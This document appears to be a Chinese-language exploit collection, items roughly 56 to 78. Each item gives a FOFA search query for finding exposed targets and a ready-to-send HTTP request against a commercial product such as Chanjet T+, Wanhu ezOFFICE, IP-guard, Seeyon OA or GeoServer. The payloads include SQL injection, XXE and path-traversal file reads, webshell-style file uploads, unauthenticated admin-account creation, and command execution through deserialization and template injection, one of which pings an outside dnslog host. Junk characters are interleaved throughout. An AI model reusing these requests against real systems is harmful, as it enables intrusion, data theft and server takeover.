& z9 X8 c. [) g4 v9 C+ i3 I( VHost: x.x.x.x
& d3 K5 S4 c+ L! o1 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36* `6 a! K4 ?0 Y' B
Content-Type: application/json& L1 l, x+ t$ z9 \6 T, b
% E4 f! B) F5 b" H% q. j{ t) F( u" o" P$ Y5 y: G/ k
"storeID":{* S$ z% K7 H* D* f3 I7 |
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",5 V! X9 U, n1 @6 }6 |3 l9 [% e6 J* h
"MethodName":"Start",/ T- m. M/ E, r5 I. ^6 y8 g) G
"ObjectInstance":{% j. H6 P# W: r- y" x9 [
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
' T& V E8 w4 a; ]5 T "StartInfo": {# m, N8 r: v4 \* B+ G
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
, }6 ?/ W% v( [5 c( O "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"* V- |# h0 ~" f. G- S0 Y* C
}
; m: z6 B* X. V# E( j1 N t# O" O }
- ~, E9 \3 A$ z) c4 u& Q0 }2 A& w }/ ?& Z& B! V4 M
}# ]+ ]9 ?- U) R4 i6 o; }. S
! o! l0 ~9 z x$ R: D; v: [
5 d# m, h# @# P; Y) j- R
57. 畅捷通T+ keyEdit.aspx SQL注入; c, a4 L6 Q! e( U/ z
FOFA:app="畅捷通-TPlus"
# F% Q( X# Z) l# X) K9 rGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1& q3 R- s: m. b+ e3 N8 W$ }. p
Host: host4 L3 T5 b9 {: I5 |
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.363 V9 v' @ Q9 U$ r
Accept-Charset: utf-82 ]) m; K& [ x) `( ^* E( r$ f
Accept-Encoding: gzip, deflate" b: z/ P) O+ H5 \
Connection: close8 e7 l3 W2 w: Q; g, R7 y
+ V( x7 R5 b, R6 e" r8 m+ U; J
4 O2 i% Z+ n6 e' E5 ^5 \5 f l58. 畅捷通T+ KeyInfoList.aspx sql注入4 ^3 F& a1 D& @0 I* ~1 a7 `
FOFA:app="畅捷通-TPlus"- o* \! N3 V# m' z2 I$ g; O7 O
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.11 b5 P* f$ F. O, b
Host: your-ip: Q* d/ M; w( O1 J3 [( \5 {, h( }
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
3 ]0 v% R7 A; Z/ e* p% d3 zAccept-Charset: utf-8
, }# W, O) D9 O1 l! YAccept-Encoding: gzip, deflate2 C* G% q. O' r# L M1 g% A2 V
Connection: close
2 y! V- f! _1 {; N6 s
, y) L- T5 P, `4 i" P% t3 L
' Z9 m9 }- X/ {. n6 N8 a& u59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
+ Z4 l& E# |% C0 {2 {FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
8 |. d) M5 O% y/ H3 t* mPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
! u- R9 U: I+ J3 d% aHost: 192.168.86.128:9090
8 T; d5 r" }/ ^$ DUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.365 }- K0 F0 h+ ^
Connection: close" Y% U6 z _7 e/ g+ M) S) Q
Content-Length: 1669" i% `0 y# }5 I+ J& f9 F
Accept: */*
$ G# D( Q- V# _7 rAccept-Language: en0 T+ `" o2 Q7 F' d+ m
Content-Type: application/x-www-form-urlencoded
2 _; ~# L& Q/ S0 {/ t. \Accept-Encoding: gzip
A6 u6 p6 O7 X2 q3 J) {6 Y, l! `0 T- c( Y$ J3 _) @
PAYLOAD
8 i8 Y9 c8 c( b5 `+ B$ t
5 T, y% W% Q) e& b
% H; ^% n x# X3 J: d60. 百卓Smart管理平台 importexport.php SQL注入
- h: i9 u c7 r* f# d8 uFOFA:title="Smart管理平台"8 [& D8 x7 B, P2 z/ D
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.10 R" K" c! z- v1 m6 y8 |* O8 {6 s
Host:. @* g, H/ O" w2 {0 t; \! o+ D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( V' p. e1 [& c/ t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ _# @" q8 G1 {7 q( s
Accept-Encoding: gzip, deflate2 l' X1 B/ s5 T/ K
Accept-Language: zh-CN,zh;q=0.9' d _) g5 F( y# x( l
Connection: close
9 `' B. \+ A4 z' Z/ m# M% U B/ N: P* g- i( p- X0 S' x |+ n( M
9 v1 H9 C- q- y! n+ E& Q# K
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传$ ?6 u! Q, Q* |' S% ]7 }, u
FOFA: title="欢迎使用浙大恩特客户资源管理系统"3 ]5 j! T( v, v: [' y {% s
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
8 w, u3 Y D- o4 C `# Z0 O# ^" OHost: x.x.x.x1 @. z% O: Z* T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; T1 { M( F- F# n7 l2 ~6 W+ }+ BConnection: close/ Q* u2 r( p, ^$ b( N% J: r
Content-Length: 279 x6 y, r9 N7 g C/ ~4 T/ V" B6 q6 u
Accept: */*
V8 J+ e: C7 P! @0 g" P: DAccept-Encoding: gzip, deflate- |* o# G2 h) E, E) e
Accept-Language: en
w* T i. h4 I& [+ d7 t7 V. |Content-Type: application/x-www-form-urlencoded3 I/ C4 g& k8 o- ]0 E# N. p
8 I# q2 P: A: y& ^8uxssX66eqrqtKObcVa0kid98xa
6 V* m* m J+ z$ U
4 H; l" g$ p( F
9 G0 f7 `4 A* @( ^, g" I; k62. IP-guard WebServer 远程命令执行/ e4 ~' ~4 a8 K
FOFA:"IP-guard" && icon_hash="2030860561"" w; ?+ y" M) {5 d. s8 y6 s
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.16 c4 E6 Y' d( L6 [
Host: x.x.x.x
% D* e b$ t* P8 F, ?! s, `0 CUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
- }- {8 u& g8 z' G3 gConnection: close
$ e8 p. P% u$ a' S" H( H4 `Accept: */*( i9 y5 g4 X& k, E' G" d; j& ]
Accept-Language: en2 a( P: }8 Z% n, e$ U% L
Accept-Encoding: gzip
( m4 s- z- C6 Y2 u* m- ?3 [0 k9 t. Q* o* U$ X, c; F1 S
+ Z2 ^5 S) T; P, G/ \0 s
访问
1 R# h) F9 V; Z D# W4 I1 K8 I& K& i2 a0 w( {# _
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
# V$ |7 D q- t( h" y& \, wHost: x.x.x.x
* d6 v, p9 `: c
7 Q L1 v" R& D& x- |
% b) z& b+ E4 X6 }% n0 L63. IP-guard WebServer任意文件读取/ M: \( Z7 B1 Y# K3 |7 o
IP-guard < 4.82.0609.0
2 z. I5 r. o4 F! Z+ Q+ r- G5 cFOFA:icon_hash="2030860561"
6 G$ H: U r% LPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
9 x5 ~0 T; Z( }- Y5 n; @- e9 sHost: your-ip' r% g% {* O/ N& S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.369 A2 N7 v. h6 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 M0 z, R! `- ]# tAccept-Encoding: gzip, deflate
! v& N; H6 j7 i; `- V- g1 n& c, R$ u, GAccept-Language: zh-CN,zh;q=0.9( x5 M/ I$ R2 F
Connection: close+ f! o! G: t' b1 v! z3 ?
Content-Type: application/x-www-form-urlencoded9 q1 W4 U9 ^4 f; F$ B/ D
! Q/ A& u: V% p5 c! L0 s; O% ^: ^$ l& i# cpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
" e# t9 h7 ]( G8 N- F( \- }# R- C% i2 K5 R$ H
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
z7 C( h- N5 f V& n/ VFOFA:body="/Scripts/EnjoyMsg.js"
4 J0 u& w% z! I# S1 {: zPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
1 j2 }* R& w' e' G$ o) wHost: 192.168.86.128:9001/ ^ k x9 i( g c2 H5 ?
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36% Y( R9 q$ a; }# y4 q, H7 K6 C
Connection: close, b d" ?! Z. @7 h- S. ?; q' b
Content-Length: 369
" u( }, P! L6 j9 R- r& x; j* Z( CAccept: */*
8 x/ Y- y* E5 o, LAccept-Language: en% ^: n' ~5 H- h. [
Content-Type: text/xml; charset=utf-8: w, X3 c* V) b1 w( ]
Accept-Encoding: gzip
7 l, y/ y5 ]4 e1 B, h9 ?: I; U d1 F; s; i
<?xml version="1.0" encoding="utf-8"?>3 }& S# u' W. |. o8 \, D, s" j
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">5 e& ^4 i* h3 D" ]* u* `
<soap:Body>
, c$ V# m$ _# L. Y& X* Y2 V3 c <GetOSpById xmlns="http://tempuri.org/">$ S' _9 P% I( e" `6 Z4 @
<sId>1';waitfor delay '0:0:5'--+</sId>
$ e# N3 {9 D V. H </GetOSpById>
) S: V! i3 B# k/ |4 E, _ </soap:Body>; y% K9 G2 g1 l5 P6 d- b
</soap:Envelope>6 v8 i7 _" d8 c5 r
9 ]0 \" x% o: D t$ z5 ]) p& S+ ^' p5 O- n7 F
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过$ Z+ C+ V, Z* h3 p
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"# U, @. P" Y" @! }# a9 P+ C
响应200即成功创建账号test123456/123456
$ n+ X" a5 X2 W+ HPOST /SystemMng.ashx HTTP/1.1$ |+ t! X/ _, k1 b3 y
Host: r; ?1 r% g& j- ~
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
: P) e! \7 S. U' RAccept-Encoding: gzip, deflate
; t) j# O+ e' X. a$ A9 ^( e' \Accept: */*
/ e/ t. _0 c9 ^, ?8 RConnection: close) w. c- @; x6 z# C' f$ S4 s6 R
Accept-Language: en
8 X J8 I7 l- g i, Y. R, EContent-Length: 174
4 S9 W' |! |7 i2 Y% h
& g% g6 }+ M; qoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
4 J- q8 o! m7 N F! [$ Y/ J. V) g1 b H2 g- W: t
9 F3 _/ I2 A1 a" I) O66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
( y/ z& s' {7 b! k! dFOFA:app="万户ezOFFICE协同管理平台" X, v+ M; n0 q9 |7 x
$ d( s9 l, g! ?$ o; [/ _GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1( {, N9 b, l9 Q, u! H
Host: x.x.x.x
5 F7 m3 `. U. c6 A2 s9 C# EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.365 C3 p/ p6 g! ]: R" o& p: L
Connection: close6 ^) ?# @( `! I: A' s
Accept: */*+ {: b3 k* M" G
Accept-Language: en5 J$ }0 r( r! K# O
Accept-Encoding: gzip
0 h+ O0 i$ F/ z# @
% K5 f! S" K" s1 X1 x6 s. V% c J' m4 ^+ Q0 e1 m
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在8 e$ ^! L& h- p" ]' `( C' l
& y3 u$ n5 j! ~/ t6 H. z+ l# g+ g4 [
67. 万户ezOFFICE wpsservlet任意文件上传
3 `" Q, l3 T/ O9 hFOFA:app="万户网络-ezOFFICE"
) n. ?1 c5 d8 I; wnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型: `0 l. j! @3 t @
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1# u; ~* N$ m7 V) N9 _
Host: x.x.x.x
7 j; n3 r9 [# N# M/ X5 C/ p1 F. `7 U( ]User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
0 ]! @" _$ O' W5 X3 CContent-Length: 1730 p( W6 F% _6 o5 ^/ W$ x5 n. u9 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.82 t# C1 w1 I' k6 D* z
Accept-Encoding: gzip, deflate, X$ G/ R* @% {! O9 P& S
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
" x" X- }6 Z# `4 j- Z8 D2 E: @Connection: close- y0 Y4 g& T v/ U9 Y% s# \0 ]
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp' k4 c6 l% U. \& J/ g
DNT: 19 B+ [4 | q5 y( Y+ E& p' z
Upgrade-Insecure-Requests: 1( g2 y c$ r$ B
, v7 `7 {2 o" P/ [! @--ufuadpxathqvxfqnuyuqaozvseiueerp
$ H7 \* k' T) V8 | _0 h5 }- HContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"& I: m- }/ u0 X- Y" d
( d& w& r8 I2 e* W$ c' h<% out.print("sasdfghjkj");%>
) L( m4 ? \1 {' `" T9 \9 f. h--ufuadpxathqvxfqnuyuqaozvseiueerp--
% k0 R+ U: @+ i6 R
- [, l1 \0 s& N( {3 _3 Q9 [
& y/ g7 B# ?/ p' y+ e& C z. c文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
) ~" Z& ^) E7 N2 l% D
- i& C- v, x( L% | C* n0 z68. 万户ezOFFICE wf_printnum.jsp SQL注入6 Y7 J: ?$ R+ k
FOFA:app="万户ezOFFICE协同管理平台"
0 ^* M+ ?2 N2 P0 d1 M) h% YGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
/ {- \9 P# E& W9 c( eHost: {{host}}
% Z& @5 j' ^8 V3 r, ?9 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36: Y4 D7 }% N0 p. ?' c* t
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8* q! F# g ]& s
Accept-Encoding: gzip, deflate, G1 \) i- _4 K4 O% V0 k
Accept-Language: zh-CN,zh;q=0.9( t a+ D: R+ `" v2 x; d* j2 E6 ~- ^
Connection: close
) l; L! }% d. ~2 r" ~6 e/ C
" R; T$ d" s" ~& v- l) a: _4 h5 B, R& o, n1 i: K) h* c5 y
69. 万户 ezOFFICE contract_gd.jsp SQL注入+ z3 h6 B1 q0 |9 ~ N- c9 b
FOFA:app="万户ezOFFICE协同管理平台"
* x @; \9 j+ j0 |GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
7 P2 R5 L5 U6 C- K- S b' cHost: your-ip
0 w% e! h* k% d7 w( c5 o: e- eUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36' a+ Z, l9 ~( v8 J& _0 L
Accept-Encoding: gzip, deflate
) g0 F" M: b( M7 wAccept: */*
1 Q8 {+ V. g+ w* W2 l: @) B9 T& oConnection: keep-alive
1 P/ f6 `- [5 a& N% a# I; C
* A- g4 M( y2 A( p! \' [( E/ I$ n! ]4 I7 a
70. 万户ezEIP success 命令执行
6 a% k+ N7 p v0 cFOFA:app="万户网络-ezEIP"; [! D/ d' P& K4 {4 x: ^" a
POST /member/success.aspx HTTP/1.12 }; \* Z0 D( E1 k
Host: {{Hostname}}
$ ~" _/ A6 L2 {5 G; B& o2 d. wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 c7 m( D" \! C4 g6 d+ G, f2 ^
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
1 s. C- z3 Z3 @/ _' B7 wContent-Type: application/x-www-form-urlencoded
8 p; e1 U/ G" H+ O+ s# K3 q, gTYPE: C, Z5 z+ V0 U! i2 ?! W b
Content-Length: 16702% v( P4 g, L" A* b$ x
, R( ^/ E+ m" X7 M# Z1 c
__VIEWSTATE=PAYLOAD; z0 K( Y# T" E5 u' D8 n" w
( G) m8 P% @6 _9 J$ n p( s, _: E' I5 w( g
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入0 d7 |# f1 f2 k
FOFA:body="PM2项目管理系统BS版增强工具.zip"
7 _; _! m" w" S. r: }GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.18 r0 J" c/ g; Z( c: A! I9 t
Host: x.x.x.xx.x.x.x/ x$ X# \8 d, H/ K9 I
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
) X1 s4 c; d2 ^Connection: close: }6 S7 @8 w! x% a/ \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- F+ m% h {2 A0 B# T& Y3 P3 P
Accept-Encoding: gzip, deflate
2 j) U# B4 f; ~& T/ o" ?7 H: J! Y! ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 S3 P: ]/ y# D/ R- c1 dUpgrade-Insecure-Requests: 1
5 T8 b h3 ]1 ]2 B X+ [0 V. \( Q1 Q8 p: H' J5 y; f; T6 Y
. L9 g6 X) \ |0 q
72. 致远OA getAjaxDataServlet XXE
5 Z2 ]8 ]; [& B1 b. V8 |0 MFOFA:app="致远互联-OA"
& d4 o! z/ \7 ?) X1 l, Z- N. R4 o$ e# YPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1& X$ J& a& H6 C) C5 k
Host: 192.168.40.131:80991 ~# t) U& l6 b+ ]; h$ y8 }3 |
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' |. N1 G# O* P0 w$ K1 f
Connection: close0 X2 w2 S: @3 W& L X* V# [5 u, Q
Content-Length: 583$ h. E2 |; P8 u7 S# B0 J
Content-Type: application/x-www-form-urlencoded, _- F0 q2 b1 }% z5 V
Accept-Encoding: gzip
@+ K5 m# k' @7 l* n) m: ?) \- c+ m' D
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
5 j7 f* B, e Y8 x0 X3 `: l1 R$ Z; f9 i9 ] L5 R# l
" a$ _. p/ o; n' F2 f, I) _
73. GeoServer wms远程代码执行7 t* F, M+ O0 f; M
FOFA:icon_hash=”97540678”2 [+ [5 Z1 W. J8 s" k* r! E# U
POST /geoserver/wms HTTP/1.11 ~) H4 A8 G& ?- Q& T" \( T5 p
Host:
8 e( P* ?! M' `$ D7 t6 RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
1 E% }' H4 E, J8 a# j, y% Q: i" v, QContent-Length: 1981
z/ g. w7 L5 H9 z( ^Accept-Encoding: gzip, deflate% ~/ A4 \- A( H* w; a& ~
Connection: close
) z7 [! H0 v7 ?( ^. @) B2 LContent-Type: application/xml
( _3 w/ t& y* mSL-CE-SUID: 3
' q7 r3 u: f/ V9 @1 h' i" I' T. k9 R" ?: z
PAYLOAD
8 o9 z5 l( Z, s z, L
5 L9 ]7 k/ L ]3 t& S
6 X+ O) K) o" C: K, [2 ^; I- D; L" c74. 致远M3-server 6_1sp1 反序列化RCE; a9 [1 m! \4 ]2 _7 M( X9 w
FOFA:title="M3-Server"( |" ~! j% q$ f) z
PAYLOAD3 F4 k5 C+ M1 i! C
2 _! G) J6 g J) g2 c75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
, e9 f6 m5 [) u! j" uFOFA:app="TELESQUARE-TLR-2005KSH"
& s, p5 P7 H. Q2 ?$ D) s( _& v0 BGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Y7 u/ x# @" b1 e* mHost: x.x.x.x
( F- C( P, }: G. V: w& XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 m' ~# U. m* g" QConnection: close
4 P# }6 v: I, z1 X. VAccept: */*
' }2 Q d/ ?+ _+ b# ^2 mAccept-Language: en" ^& c( S1 {( \ ^% {
Accept-Encoding: gzip
1 W% w' U' i) f6 F: l: J9 b3 T4 I! n6 n. _- m6 ^ e
2 Y0 n/ ]+ A) P! O d8 x, Y
GET /cgi-bin/test28256.txt HTTP/1.1/ h! n, g% x/ I& v
Host: x.x.x.x! r( g m: U8 R
2 _9 _: m+ v9 M( K! a5 h5 ?
8 I" B3 W3 h6 u4 F2 C9 f76. 新开普掌上校园服务管理平台service.action远程命令执行
4 H" T. m' L0 n: A# k+ vFOFA:title="掌上校园服务管理平台"
: C4 E! |( U- I3 z4 L0 {% HPOST /service_transport/service.action HTTP/1.15 z- A: x3 i& K- c
Host: x.x.x.x- [7 |% k8 v7 e' {8 U& E" z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.02 ~. U6 J* s: r
Connection: close
~0 P/ b6 B$ {5 {) Y1 R* ~1 PContent-Length: 211+ e2 `. e( o8 n- q% M: H4 z7 o' U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 V: i% Y9 V. {& R( v9 B! f8 aAccept-Encoding: gzip, deflate1 w1 P4 a- p7 f8 y& [2 q. J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. D* {5 P, F- G$ QCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
, Z0 X0 t8 S" S5 v: ?/ IUpgrade-Insecure-Requests: 1
: H0 _. E' m3 E/ z7 z
9 {9 }* p4 V) x{5 P( r' Y7 Y) z8 r& ]9 W$ }
"command": "GetFZinfo",
: H2 v1 K! I4 e- a: s( z: {, S "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"6 u. B* l5 n" }1 Z
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
, e2 B5 v0 x1 ~( T" G}* z5 V3 N/ q* u2 _6 c: [
7 [' x- y4 L$ c& \- G
% I8 ]" J0 A/ O& ~+ i3 IGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
! i+ K4 R7 O* K" n8 D# Y: tHost: x.x.x.x4 y. T ?% ]( c3 A: J
[0 T; Z- ?9 T" @- f0 Y6 L
# P+ D. ]9 N5 q$ N) M& u
D+ l- V6 k. D7 a+ I77. F22服装管理软件系统UploadHandler.ashx任意文件上传; Z5 l$ ]& l. ^/ }. v- }6 U) d, A
FOFA:body="F22WEB登陆"
7 S' [0 m; p o1 \0 G1 o* ?5 yPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
$ m: D; R" o4 L) }& WHost: x.x.x.x$ ~/ U4 f; X1 _/ B& \1 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36% m: y8 O* R7 s* P3 M6 k5 W6 [8 m
Connection: close
. A$ U b0 c7 x9 f! VContent-Length: 433# a5 ?: W9 \. B# _* d9 h
Accept: */*
. r0 z( R' H, E& ~ H, x2 RAccept-Encoding: gzip, deflate
; W7 _% ^5 i# YAccept-Language: zh-CN,zh;q=0.9
2 V4 g. I1 y4 B" l$ h2 ^' jContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix# O4 _! b/ w& w! P
9 u& O$ q9 L! u6 @+ d' S
------------398jnjVTTlDVXHlE7yYnfwBoix7 m" M9 i* Q: Y0 X+ H7 z# u# M
Content-Disposition: form-data; name="folder"' L9 m2 w" _/ m$ m3 V: c7 s
/ H# s" ^: e( ?* \% N4 o
/upload/udplog5 A- s3 A" b; Z& `- l
------------398jnjVTTlDVXHlE7yYnfwBoix
3 x0 L( g( x# i, `3 P# U x8 YContent-Disposition: form-data; name="Filedata"; filename="1.aspx"8 ~% I$ V6 {5 W/ f# f
Content-Type: application/octet-stream
- s3 T1 _8 ~2 x7 e& C7 K& r9 [! L+ M" e- e2 z8 m
hello1234567/ R( |* {) z( u% a. R& N( \- X
------------398jnjVTTlDVXHlE7yYnfwBoix
2 l. t$ j" k+ rContent-Disposition: form-data; name="Upload"
' }& S$ F# I' @% L2 @; O2 i& r1 ?- u% o
Submit Query4 d) k- r) o- c+ y3 y y' Z
------------398jnjVTTlDVXHlE7yYnfwBoix--
; L' k2 ?- f1 V. V8 `' H! R/ |9 J; }* s7 y
) s, T! ?' Y% F5 b. f$ J9 g78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
+ e9 z* }' O# \1 y$ H0 JFOFA:icon_hash="2001627082"* m9 K- Y" _7 k4 ~) p6 q
POST /Platform/System/FileUpload.ashx HTTP/1.1
3 p( F- s; J9 M8 b+ hHost: x.x.x.x
4 M: }' J2 F, vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ q' g/ [; X) o* \
Connection: close/ d/ ?9 z, R7 y$ K8 G; u
Content-Length: 336# J6 R9 ~0 v- W* I) q A' g* _9 q
Accept-Encoding: gzip- O: M3 P: J) ~" {
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
) C0 h5 Q' \3 U, b" o2 D) h
/ s- t8 u4 u. \0 o" e- ]5 z# x: ?------YsOxWxSvj1KyZow1PTsh98fdu6l
k* Z; ^: M- d: ?Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
@6 ]* d3 x5 @0 l* PContent-Type: image/png
